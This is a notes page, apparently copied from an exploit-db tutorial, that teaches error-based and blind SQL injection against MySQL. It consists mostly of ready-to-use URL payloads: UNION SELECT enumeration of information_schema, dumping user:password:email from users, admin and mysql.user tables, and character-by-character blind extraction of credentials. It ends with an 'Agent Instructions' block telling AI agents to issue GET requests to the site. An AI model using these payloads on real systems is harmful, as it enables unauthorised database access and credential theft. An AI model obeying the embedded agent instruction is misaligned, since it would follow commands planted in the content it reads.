# SQL Injection Tutorial taken from exploit-db. \ Source: ## PentestLab Cheat Sheet {% embed url="" %} ## Portswigger Cheat Sheet {% embed url="" %} ## What is SQL injection? It's one of the most common vulnerability in web applications today. It allows attacker to execute database query in URL and gain access to some confidential information etc...(in shortly). 1.SQL Injection (classic or error based or whatever you call it) 2.Blind SQL Injection (the harder part) ## Error Based SQL Injection ### 1) Check for vulnerability Let's say that we have some site like this ```http http://server/news.php?id=5 ``` Now to test if is vulnerable we add to the end of URL **`'`** (quote), and that would be ```http http://server/news.php?id=5' ``` so if we get some error like the one below, that means is vulnerable to SQL injection ```http You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc... ``` ### 2) Find the number of columns To find number of columns we use statement **ORDER BY** (tells database how to order the result) so how to use it? Well just increment the number until we get an error. As you can see below that means that the table has 3 columns, because we got an error on 4. ```http http://server/news.php?id=5 order by 1/* <-- no error http://server/news.php?id=5 order by 2/* <-- no error http://server/news.php?id=5 order by 3/* <-- no error http://server/news.php?id=5 order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that) ``` ### 3) Check for UNION Function With union we can select more data in one SQL statement. We already found that number of columns are 3 from step 2. Therefore, we can try the following: ```http http://server/news.php?id=5 union all select 1,2,3/* ``` If we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works. ### 4) Check for MySQL version ```bash http://server/news.php?id=5 union all select 1,2,3/* # NOTE # if /* not working or you get some error, then try -- # it's a comment and it's important for our query to work properly. ``` Let say that we have number 2 on the screen, now to check for version we replace the number 2 with **`@@version`** or **`version()`** and get something like **`4.1.33-log`** or **`5.0.45`** or similar. it should look like this: ```bash http://server/news.php?id=5 union all select 1,@@version,3/* ``` if you get an error like the one below, you can use the **`convert()`** function or the**`hex()`** and **`unhex()`** functions. ```bash union + illegal mix of collations (IMPLICIT + COERCIBLE) ... ``` Using the **`convert()`** function: ```http http://server/news.php?id=5 union all select 1,convert(@@version using latin1),3/* ``` Using the **`hex()`** and **`unhex()`** functions. ```http http://server/news.php?id=5 union all select 1,unhex(hex(@@version)),3/* ``` ### 5) Getting Table and Column Name #### MySQL version is < 5 If the MySQL **version is < 5** (i.e 4.1.33, 4.1.12...), we must guess table and column name in most cases. **Common table names are**:\ \&#xNAN;**`user/s, admin/s, member/s ...`** **Common column names are**: **`username, user, usr, user_name, password, pass, passwd, pwd etc...`** ```http http://server/news.php?id=5 union all select 1,2,3 from admin/* ``` If you see number 2 on the screen like before, then that's good and we know that table admin exists... #### To check column names. ```http http://server/news.php?id=5 union all select 1,username,3 from admin/* # if you get an error, then try the other column name ``` Now to check if column **`password`** exists ```http http://server/news.php?id=5 union all select 1,password,3 from admin/* # if you get an error, then try the other column name ``` Now we must complete query to look nice and for that we can use **`concat()`** function (it joins strings) ```http http://server/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/* ``` Note the **`0x3a`**, its hex value for **`:`** (colon). There is another way for that, **`char(58)`**, ASCII value for **`:`** ```http http://server/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/* ``` if you can't guess the right table name, you can always try **`mysql.user`** (default). It has user and password columns, so an example would be: ```http http://server/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/* ``` #### MySQL version > 5 For this we need **`information_schema`**. It holds all tables and columns in database. To get tables we use **`table_name`** and **`information_schema.tables`** Example: ```http http://server/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/* ``` Here we replace the number 2 with **`table_name`** to get the first table from **`information_schema.tables`** displayed on the screen. Now we must add LIMIT to the end of query to list out all tables. ```http http://server/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/* ``` Notice that we put 0,1 (get 1 result starting from the 0th) now to view the second table, we change limit 0,1 to limit 1,1 and the second table is displayed. ```http http://server/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/* ``` For third table we put limit 2,1 ```http http://server/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/* ``` Keep incrementing until you get some useful like **db\_admin**, **poll\_user**, **auth**, **auth\_user** etc... #### To get the column names To get the column names, the method is the same. Here we use **`column_name`** and **`information_schema.columns`** The method is same as above so example would be: ```http http://server/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/* ``` For the second one (we change limit 0,1 to limit 1,1) ```http http://server/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/* ``` The second column is displayed, so keep incrementing until you get something like **`username`**,**`user`**,**`login`**, **`password`**, **pass**, **`passwd`** etc... If you want to display column names for a specific table use this query. (where clause) Let's say that we found table users: ```http http://server/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/* ``` Now we get displayed column name in table users. Just using LIMIT we can list all columns in table users. Note that this won't work if the magic quotes is ON. Let's say that we found columns **`user`**, **`pass`** and **`email`**. To complete the query and to put them all together we can use **`concat()`** as described it earlier. ```http http://server/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/* ``` What we get here is **`user:pass:email`** from table users. Example: \ \&#xNAN;**`admin : 7576f3a00f6de47b0c72c5baf2d505b0 : admin@example.com`** ## Blind SQL Injection Blind injection is a little more complicated the classic injection but it can be done. We will be using the following for our example. ```http http://server/news.php?id=5 ``` When we execute this, we see some page and articles on that page, pictures etc...then when we want to test it for blind SQL injection attack. ```http http://server/news.php?id=5 and 1=1 <--- this is always true ``` And the page loads normally, that's ok. Now the real test: ```http http://server/news.php?id=5 and 1=2 <--- this is false ``` so if some text, picture or some content is missing on returned page then that site is vulnerable to blind SQL injection. ### 1) Get the MySQL version To get the version in blind attack we use **`substring`** ```http http://server/news.php?id=5 and substring(@@version,1,1)=4 ``` This should return **TRUE** if the version of MySQL is 4. Replace 4 with 5, and if query return TRUE then the version is 5. Example: ```http http://server/news.php?id=5 and substring(@@version,1,1)=5 ``` ### 2) Test if subselect works when select don't work then we use **`subselect`** Example: ```http http://server/news.php?id=5 and (select 1)=1 ``` if page loads normally then **`subselect`** works. Then we are going to see if we have access to **`mysql.user`** Example: ```http http://server/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1 ``` if page loads normally we have access to **`mysql.user`** and then later we can pull some password using **`load_file()`** function and **`OUTFILE`**. ### 3) Check table and column names This is part when guessing is the best friend :) Example: ```bash http://server/news.php?id=5 and (select 1 from users limit 0,1)=1 # With limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important. ``` If the page loads normally without content missing, the table users exits. if you get **FALSE** (some article missing), just change table name until you guess the right one. Let's say that we have found that table name is **users**, now what we need is column name. Just like with table name, we start guessing and using the common names for columns. Example: ```bash http://server/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1 ``` if the page loads normally we know that column name is **password** (if we get **FALSE**, then try other common names or just guess) Here we merge 1 with the column **`password`**, then **`substring`** returns the first character (,1,1) ### 4) Pull data from database We found table **users and** columns **username, password** so we gonna pull characters from that. ```bash http://server/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80 ``` The above command would pull the first character from the first user in the table users. substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value and then compare it with simbol greater then > . so if the ascii char greater then 80, the page loads normally. (TRUE) we keep trying until we get false. and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95 we get TRUE, keep incrementing and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98 TRUE again, higher and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99 FALSE!!! so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'. then let's check the second character. and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99 Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght) and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99 TRUE, the page loads normally, higher. and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107 FALSE, lower number. and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104 TRUE, higher. and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105 FALSE!!! we know that the second character is char(105) and that is 'i'. We have 'ci' so far, so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end). --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://squid22.gitbook.io/notes/sql-injection.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.